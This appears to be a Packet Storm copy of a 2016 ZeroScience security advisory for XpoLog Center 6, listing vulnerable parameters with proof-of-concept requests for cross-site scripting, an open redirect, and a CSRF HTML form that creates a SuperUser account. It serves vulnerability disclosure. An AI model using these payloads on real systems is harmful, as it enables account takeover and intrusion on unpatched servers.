what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

XpoLog Center 6 XSS / CSRF / Open Redirect

XpoLog Center 6 XSS / CSRF / Open Redirect
Posted Jul 1, 2016
Authored by LiquidWorm | Site zeroscience.mk

XpoLog version 6 suffers from cross site scripting, open redirection, and cross site request forgery vulnerabilitie.

tags | exploit, xss, csrf
SHA-256 | 2ab464bfc0f5a39be1056dbad1fb0a9fec338572e2cfc1ea1b4a2426dadeeb5e

XpoLog Center 6 XSS / CSRF / Open Redirect

Change Mirror Download

XpoLog Center V6 Multiple Remote Vulnerabilities


Vendor: XpoLog LTD
Product web page: http://www.xpolog.com
Affected version: 6.4469
6.4254
6.4252
6.4250
6.4237
6.4235
5.4018

Summary: Applications Log Analysis and Management Platform.

Desc: XpoLog suffers from multiple vulnerabilities including
XSS, Open Redirection and Cross-Site Request Forgery.

Tested on: Apache-Coyote/1.1
Microsoft Windows Server 2012
Microsoft Windows 7 Professional SP1 EN 64bit
Java/1.7.0_45
Java/1.8.0.91


Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience


Advisory ID: ZSL-2016-5334
Advisory URL: http://zeroscience.mk/en/vulnerabilities/ZSL-2016-5334.php


14.06.2016

--


XSS:
----

http://10.0.0.17:30303/logeye/apps/admin/appAdminAction.jsp [actionType parameter]
http://10.0.0.17:30303/logeye/apps/admin/appAdminAction.jsp [dataGenerationInterval parameter]
http://10.0.0.17:30303/logeye/apps/admin/appAdminAction.jsp [desc parameter]
http://10.0.0.17:30303/logeye/apps/admin/appAdminAction.jsp [key JSON parameter within the timeFrame parameter]
http://10.0.0.17:30303/logeye/apps/admin/appAdminAction.jsp [name parameter]
http://10.0.0.17:30303/logeye/apps/getData.jsp [id JSON parameter within the appsModelObj parameter]
http://10.0.0.17:30303/logeye/common/addLogFilter.jsp [newFilterLabel parameter]
http://10.0.0.17:30303/logeye/common/addLogFilter.jsp [tableStyle parameter]
http://10.0.0.17:30303/logeye/common/buttonsFooter.jsp [actionNames parameter]
http://10.0.0.17:30303/logeye/common/buttonsFooter.jsp [actions parameter]
http://10.0.0.17:30303/logeye/common/buttonsFooter.jsp [align parameter]
http://10.0.0.17:30303/logeye/common/buttonsFooter.jsp [baseDirectory parameter]
http://10.0.0.17:30303/logeye/common/selectLog.jsp [ignoreHeader parameter]
http://10.0.0.17:30303/logeye/common/validatePath.jsp [path parameter]
http://10.0.0.17:30303/logeye/componentAction.jsp [forward parameter]
http://10.0.0.17:30303/logeye/componentAction.jsp [mainPage parameter within the forward parameter]
http://10.0.0.17:30303/logeye/dashboard/admin/dashboardAdministration.jsp [name of an arbitrarily supplied URL parameter]
http://10.0.0.17:30303/logeye/dashboard/view/updateDashboardModel.jsp [viewBy parameter]
http://10.0.0.17:30303/logeye/listeners/admin/listenersAdminViewAccountsTable.jsp [type parameter]
http://10.0.0.17:30303/logeye/listeners/admin/listenersAdminViewAccountsTableContent.jsp [type parameter]
http://10.0.0.17:30303/logeye/listeners/admin/popupDiv.jsp [buttonsActions parameter]
http://10.0.0.17:30303/logeye/listeners/admin/popupDiv.jsp [buttonsAlign parameter]
http://10.0.0.17:30303/logeye/listeners/admin/popupDiv.jsp [buttonsColors parameter]
http://10.0.0.17:30303/logeye/listeners/admin/popupDiv.jsp [buttonsIds parameter]
http://10.0.0.17:30303/logeye/listeners/admin/popupDiv.jsp [buttonsTexts parameter]
http://10.0.0.17:30303/logeye/listeners/admin/popupDiv.jsp [divId parameter]
http://10.0.0.17:30303/logeye/listeners/admin/popupDiv.jsp [id parameter]
http://10.0.0.17:30303/logeye/listeners/admin/popupDiv.jsp [title parameter]
http://10.0.0.17:30303/logeye/listeners/admin/popupDiv.jsp [titleImage parameter]
http://10.0.0.17:30303/logeye/loggers/admin/logAdminGate.jsp [logType parameter]
http://10.0.0.17:30303/logeye/monitor/monitorDefinition.jsp [name of an arbitrarily supplied URL parameter]
http://10.0.0.17:30303/logeye/root.jsp [mainPage parameter]
http://10.0.0.17:30303/logeye/settings/mailsetaction.jsp [HttpPort parameter]
http://10.0.0.17:30303/logeye/settings/mailsetaction.jsp [SslProt parameter]
http://10.0.0.17:30303/logeye/settings/saveopok.jsp [userMessage parameter]
http://10.0.0.17:30303/logeye/settings/settings.jsp [message parameter]
http://10.0.0.17:30303/logeye/support/basic/logsViewXML.jsp [clusterNode parameter]
http://10.0.0.17:30303/logeye/tasks/xpotaskDefinition.jsp [ID parameter]
http://10.0.0.17:30303/logeye/tasks/xpotaskDefinition.jsp [TASK_TYPE parameter]
http://10.0.0.17:30303/logeye/tools/addresses/addAccountAction.jsp [ACTION_TYPE parameter]
http://10.0.0.17:30303/logeye/tools/addresses/addAccountAction.jsp [Name parameter]
http://10.0.0.17:30303/logeye/tools/addresses/addAccountDiv.jsp [ACC_ID parameter]
http://10.0.0.17:30303/logeye/tools/addresses/addAccountDiv.jsp [ACC_TYPE parameter]
http://10.0.0.17:30303/logeye/tools/addresses/addAccountDiv.jsp [base_directory parameter]
http://10.0.0.17:30303/logeye/tools/addresses/addAccountDiv.jsp [divHeight parameter]
http://10.0.0.17:30303/logeye/tools/addresses/db/general/driverHandler.jsp [url parameter]

PoC:
----

POST /logeye/common/addLogFilter.jsp? HTTP/1.1
Host: 10.0.0.17:30303

baseDirectory=../&embedded=true&tableStyle=none&newFilterLabel=Match%20Text<script>alert(1)<%2fscript>8&ajaxTimestamp=1465928888471

--

GET /logeye/componentAction.jsp?selectedCompId=XpoLog&forward=root.jsp%3fmainPage%3dsettings%2fsettings.jsp><script>alert(2)</script> HTTP/1.1
GET /logeye/root.jsp?mainPage=javascript:alert(3)//


Open Redirect:
--------------

http://10.0.0.17:30303/logeye/componentAction.jsp?selectedCompId=XpoLog&forward=http://zeroscience.mk


CSRF Add SuperUser:
-------------------

<html>
<body>
<form action="http://10.0.0.17:30303/logeye/security/management/userSettingsAction.jsp" method="POST">
<input type="hidden" name="isEditMode" value="false" />
<input type="hidden" name="username" value="testingus" />
<input type="hidden" name="password" value="123123" />
<input type="hidden" name="confirmPassword" value="123123" />
<input type="hidden" name="displayName" value="Tester" />
<input type="hidden" name="availableGroupsList" value="SuperUser" />
<input type="hidden" name="SelectedGroupsList" value="All" />
<input type="hidden" name="SelectedGroupsList" value="administrators" />
<input type="hidden" name="SelectedGroupsList" value="SuperUser" />
<input type="hidden" name="administeredGroupsList" value="All" />
<input type="hidden" name="SelectedAdministeredGroupsList" value="SuperUser" />
<input type="hidden" name="SelectedAdministeredGroupsList" value="administrators" />
<input type="hidden" name="SelectedAdministeredGroupsList" value="All" />
<input type="hidden" name="UserPolicy" value="sone" />
<input type="hidden" name="selectedPolicy" value="default" />
<input type="submit" value="Submit" />
</form>
</body>
</html>
Login or Register to add favorites

File Archive:

November 2022

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Nov 1st
    16 Files
  • 2
    Nov 2nd
    17 Files
  • 3
    Nov 3rd
    17 Files
  • 4
    Nov 4th
    11 Files
  • 5
    Nov 5th
    0 Files
  • 6
    Nov 6th
    0 Files
  • 7
    Nov 7th
    3 Files
  • 8
    Nov 8th
    59 Files
  • 9
    Nov 9th
    12 Files
  • 10
    Nov 10th
    6 Files
  • 11
    Nov 11th
    11 Files
  • 12
    Nov 12th
    1 Files
  • 13
    Nov 13th
    0 Files
  • 14
    Nov 14th
    9 Files
  • 15
    Nov 15th
    33 Files
  • 16
    Nov 16th
    53 Files
  • 17
    Nov 17th
    11 Files
  • 18
    Nov 18th
    14 Files
  • 19
    Nov 19th
    0 Files
  • 20
    Nov 20th
    0 Files
  • 21
    Nov 21st
    26 Files
  • 22
    Nov 22nd
    22 Files
  • 23
    Nov 23rd
    10 Files
  • 24
    Nov 24th
    9 Files
  • 25
    Nov 25th
    11 Files
  • 26
    Nov 26th
    0 Files
  • 27
    Nov 27th
    0 Files
  • 28
    Nov 28th
    0 Files
  • 29
    Nov 29th
    0 Files
  • 30
    Nov 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Hosting By
Rokasec
close